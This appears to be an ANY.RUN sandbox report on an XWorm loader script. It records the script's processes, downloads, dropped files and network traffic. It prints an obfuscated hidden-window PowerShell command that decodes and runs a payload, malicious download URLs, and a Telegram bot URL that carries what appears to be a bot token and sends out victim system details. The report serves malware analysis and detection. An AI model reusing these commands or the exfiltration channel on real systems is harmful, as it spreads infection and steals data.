File name:

file.ps1

Full analysis: https://app.any.run/tasks/a3c1b404-2a73-4a6e-a673-6b7e51050716
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: March 20, 2025, 22:32:20
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
loader
telegram
remote
xworm
arch-doc
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

A545636AD57C59678B37A1BE4A312198

SHA1:

F6D7E4F633B0D0B4D05B01948B247AC6C0778804

SHA256:

92F7C49C24134DB3D86284DA0C23947310505C20A60040FBCF61E32AE7B8FA1C

SSDEEP:

24:V5bnCT9+yHWrH3HDlJHhyzTbqIH1jTDoQtRF:V5SQrrXjlJBAb7BD3tRF

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 5380)
      • powershell.exe (PID: 6404)
      • powershell.exe (PID: 6744)
      • powershell.exe (PID: 2096)
      • powershell.exe (PID: 720)
      • powershell.exe (PID: 728)

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 5508)
      • powershell.exe (PID: 5380)
      • cmd.exe (PID: 780)
      • cmd.exe (PID: 920)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6744)
      • powershell.exe (PID: 2096)
      • powershell.exe (PID: 728)

    • Create files in the Startup directory

      • powershell.exe (PID: 6404)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 3784)
      • powershell.exe (PID: 5552)
      • powershell.exe (PID: 744)
      • powershell.exe (PID: 1244)

    • XWORM has been detected (SURICATA)

      • PING.EXE (PID: 2236)

    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 720)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 5380)
      • powershell.exe (PID: 6404)
      • powershell.exe (PID: 720)
      • wscript.exe (PID: 4464)
      • wscript.exe (PID: 6808)
      • wscript.exe (PID: 6652)
      • wscript.exe (PID: 6080)

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 5380)
      • cmd.exe (PID: 780)
      • cmd.exe (PID: 920)
      • cmd.exe (PID: 1240)
      • cmd.exe (PID: 5508)
      • cmd.exe (PID: 3020)
      • cmd.exe (PID: 5508)
      • cmd.exe (PID: 2392)

    • Process requests binary or script from the Internet

      • powershell.exe (PID: 5380)
      • powershell.exe (PID: 6404)

    • The process executes Powershell scripts

      • powershell.exe (PID: 5380)

    • Application launched itself

      • powershell.exe (PID: 5380)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6808)
      • wscript.exe (PID: 4464)
      • wscript.exe (PID: 6080)
      • wscript.exe (PID: 6652)

    • Executing commands from a ".bat" file

      • wscript.exe (PID: 6808)
      • wscript.exe (PID: 4464)
      • wscript.exe (PID: 6080)
      • wscript.exe (PID: 6652)

    • The process executes VB scripts

      • powershell.exe (PID: 6404)

    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 6808)
      • wscript.exe (PID: 4464)
      • wscript.exe (PID: 6652)
      • wscript.exe (PID: 6080)

    • Converts TXT file into a string

      • powershell.exe (PID: 5552)
      • powershell.exe (PID: 1244)
      • powershell.exe (PID: 3784)
      • powershell.exe (PID: 744)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 5552)
      • powershell.exe (PID: 1244)
      • powershell.exe (PID: 744)
      • powershell.exe (PID: 3784)

    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 5508)
      • cmd.exe (PID: 1240)
      • cmd.exe (PID: 2392)
      • cmd.exe (PID: 3020)

    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • PING.EXE (PID: 2236)

    • Connects to unusual port

      • PING.EXE (PID: 1660)
      • PING.EXE (PID: 2236)

    • Contacting a server suspected of hosting an CnC

      • PING.EXE (PID: 2236)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 720)

    • Process drops python dynamic module

      • powershell.exe (PID: 720)

  • INFO

    • Disables trace logs

      • powershell.exe (PID: 5380)
      • powershell.exe (PID: 6404)
      • powershell.exe (PID: 720)
      • PING.EXE (PID: 2236)

    • Checks proxy server information

      • powershell.exe (PID: 5380)
      • powershell.exe (PID: 6404)
      • powershell.exe (PID: 720)
      • PING.EXE (PID: 2236)
      • slui.exe (PID: 1276)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 2096)
      • powershell.exe (PID: 6744)
      • powershell.exe (PID: 728)

    • Autorun file from Startup directory

      • powershell.exe (PID: 6404)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 1244)
      • powershell.exe (PID: 5552)
      • powershell.exe (PID: 3784)
      • powershell.exe (PID: 744)

    • Manual execution by a user

      • wscript.exe (PID: 6080)
      • wscript.exe (PID: 6652)
      • notepad.exe (PID: 2908)
      • notepad.exe (PID: 4172)
      • notepad.exe (PID: 5452)
      • OpenWith.exe (PID: 5508)
      • notepad.exe (PID: 2840)
      • OpenWith.exe (PID: 5600)
      • OpenWith.exe (PID: 6700)
      • OpenWith.exe (PID: 3176)

    • Reads the software policy settings

      • PING.EXE (PID: 2236)

    • The sample compiled with english language support

      • powershell.exe (PID: 720)

    • Reads security settings of Internet Explorer

      • notepad.exe (PID: 4172)
      • notepad.exe (PID: 2840)
      • notepad.exe (PID: 2908)
      • notepad.exe (PID: 5452)

    • Reads Microsoft Office registry keys

      • OpenWith.exe (PID: 5508)
      • OpenWith.exe (PID: 5600)

    • Creates files or folders in the user directory

      • PING.EXE (PID: 1660)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
174
Monitored processes
53
Malicious processes
12
Suspicious processes
3

Behavior graph

Click at the process to see the details
start powershell.exe conhost.exe no specs cmd.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs cmd.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs cmd.exe no specs powershell.exe no specs conhost.exe no specs wscript.exe no specs wscript.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs wscript.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs #XWORM ping.exe conhost.exe no specs ping.exe conhost.exe no specs ping.exe no specs conhost.exe no specs wscript.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs ping.exe no specs conhost.exe no specs slui.exe notepad.exe no specs notepad.exe no specs notepad.exe no specs notepad.exe no specs openwith.exe no specs openwith.exe no specs openwith.exe no specs openwith.exe no specs svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
720"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\admin\AppData\Local\pyhw.ps1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
728powershell -ArgumentList "-WindowStyle Hidden -ExecutionPolicy Bypass -Command"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
744POwERshEll -W H -C "IEX([SYSTem.Text.EnCOdINg]::uTf8.gETSTRinG([SySTEm.cOnveRt]::fROmbase64StriNG(($edrBVDSYisRFkGrVqeaPno=[SYsteM.iO.fiLe]::READAllTExt('C:\Users\admin\AppData\Local\data.bat')).SubsTriNg($edrBVDSYisRFkGrVqeaPno.lengTH - 230688))))"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
780"C:\WINDOWS\system32\cmd.exe" /c start /min powershell -ArgumentList "-WindowStyle Hidden -ExecutionPolicy Bypass -Command"C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
780\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
920"C:\WINDOWS\system32\cmd.exe" /c start /min powershell -ArgumentList "-WindowStyle Hidden -ExecutionPolicy Bypass -Command"C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
1040\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1116\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1240"C:\Windows\System32\cmd.exe" /c "C:\Users\admin\AppData\Local\version.bat"C:\Windows\System32\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
1244POwERshEll -W H -C "IEX([SYSTem.Text.EnCOdINg]::uTf8.gETSTRinG([SySTEm.cOnveRt]::fROmbase64StriNG(($edrBVDSYisRFkGrVqeaPno=[SYsteM.iO.fiLe]::READAllTExt('C:\Users\admin\AppData\Local\data.bat')).SubsTriNg($edrBVDSYisRFkGrVqeaPno.lengTH - 230688))))"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
64 155
Read events
64 136
Write events
19
Delete events
0

Modification events

(PID) Process:(6404) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbs\OpenWithProgids
Operation:writeName:VBSFile
Value:
(PID) Process:(6404) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:SlowContextMenuEntries
Value:
6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
(PID) Process:(2236) PING.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ping_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2236) PING.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ping_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(2236) PING.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ping_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(2236) PING.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ping_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(2236) PING.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ping_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(2236) PING.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ping_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(2236) PING.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ping_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(2236) PING.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ping_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
Executable files
71
Suspicious files
397
Text files
1 541
Unknown types
0

Dropped files

PID
Process
Filename
Type
5380powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_fydhlnic.4mc.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6744powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF10cc3b.TMPbinary
MD5:44CD0856CBDC8C2E4DE80B75DDE75CBE
SHA256:78D4DDAE5D4891169FFD919006A61754C702875DE728EB317540876951EFE750
5380powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\77W4OOCA7S8M2MY150L5.tempbinary
MD5:44CD0856CBDC8C2E4DE80B75DDE75CBE
SHA256:78D4DDAE5D4891169FFD919006A61754C702875DE728EB317540876951EFE750
2096powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF10d92b.TMPbinary
MD5:04A14DFF61996CFF80EA65DD7DA411B4
SHA256:10F62C2622350715C9F80BB38902A3D06C418A26F80953F9992D569503EE2651
5380powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF10c1bb.TMPbinary
MD5:D040F64E9E7A2BB91ABCA5613424598E
SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
2096powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\F3O3BUM3P4R1RQDAK3K1.tempbinary
MD5:4386C1BFAF2F131FFB862CFE9FCA93CC
SHA256:BEF60DA733DC9766D202276184F37FC940BA39050321CA489E1CEDD8B28F7731
6404powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ic1eed2h.hyr.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2096powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:4386C1BFAF2F131FFB862CFE9FCA93CC
SHA256:BEF60DA733DC9766D202276184F37FC940BA39050321CA489E1CEDD8B28F7731
5380powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:44CD0856CBDC8C2E4DE80B75DDE75CBE
SHA256:78D4DDAE5D4891169FFD919006A61754C702875DE728EB317540876951EFE750
5380powershell.exeC:\Users\admin\AppData\Local\rhw.ps1text
MD5:09B33C31893B6E905354F3ABC93FA4EB
SHA256:C94C63954D38869DB63D24CB8542E0745D3CEE866E2179A4F6784839468C998A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
12
TCP/UDP connections
68
DNS requests
8
Threats
22

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2104
svchost.exe
GET
200
184.24.77.27:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5380
powershell.exe
GET
200
15.235.130.195:80
http://activetools.live/rhw.ps1
unknown
malicious
6404
powershell.exe
GET
200
15.235.130.195:80
http://activetools.live/data.bat
unknown
malicious
6404
powershell.exe
GET
200
15.235.130.195:80
http://activetools.live/Host.vbs
unknown
malicious
GET
200
15.235.130.195:80
http://activetools.live/version.bat
unknown
malicious
5380
powershell.exe
GET
200
15.235.130.195:80
http://activetools.live/pyhw.ps1
unknown
malicious
GET
302
140.82.121.4:443
https://github.com/Ladyhaha06/Python/archive/refs/heads/main.zip
unknown
6404
powershell.exe
GET
200
15.235.130.195:80
http://activetools.live/version.vbs
unknown
malicious
GET
200
140.82.121.4:443
https://codeload.github.com/Ladyhaha06/Python/zip/refs/heads/main
unknown
compressed
51.8 Mb
whitelisted
GET
200
149.154.167.99:443
https://api.telegram.org/bot7893859191:AAHLsNiKLZvrhmqdFg6_SNlFeLv3-gwCyLI/sendMessage?chat_id=1773070934&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AC675AA541651500BD358%0D%0A%0D%0AUserName%20:%20admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20%20i5-6400%20%20@%202.70GHz%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%203.99%20GB%0D%0AGroub%20:%20Th3
unknown
binary
609 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
192.168.100.255:137
whitelisted
40.127.240.158:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
2104
svchost.exe
40.127.240.158:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
4
System
192.168.100.255:138
whitelisted
2104
svchost.exe
184.24.77.27:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2104
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5380
powershell.exe
15.235.130.195:80
activetools.live
OVH SAS
SG
malicious
6404
powershell.exe
15.235.130.195:80
activetools.live
OVH SAS
SG
malicious
720
powershell.exe
140.82.121.3:443
github.com
GITHUB
US
whitelisted
720
powershell.exe
140.82.121.9:443
codeload.github.com
GITHUB
US
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 172.217.23.110
whitelisted
crl.microsoft.com
  • 184.24.77.27
  • 184.24.77.31
  • 184.24.77.28
  • 184.24.77.14
  • 184.24.77.24
  • 184.24.77.15
  • 184.24.77.17
  • 184.24.77.11
  • 184.24.77.30
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
activetools.live
  • 15.235.130.195
unknown
github.com
  • 140.82.121.3
whitelisted
codeload.github.com
  • 140.82.121.9
whitelisted
api.telegram.org
  • 149.154.167.220
whitelisted
activation-v2.sls.microsoft.com
  • 40.91.76.224
whitelisted

Threats

PID
Process
Class
Message
5380
powershell.exe
Potentially Bad Traffic
ET INFO PS1 Powershell File Request
5380
powershell.exe
Potentially Bad Traffic
ET HUNTING Generic Powershell Launching Hidden Window
5380
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
5380
powershell.exe
A Network Trojan was detected
LOADER [ANY.RUN] Gen.Powershell.Downloader Script Payload
6404
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
6404
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
6404
powershell.exe
A Network Trojan was detected
SUSPICIOUS [ANY.RUN] VBS is used to run Shell
5380
powershell.exe
Potentially Bad Traffic
ET INFO PS1 Powershell File Request
5380
powershell.exe
Potentially Bad Traffic
ET HUNTING Generic Powershell Launching Hidden Window
5380
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
file.ps1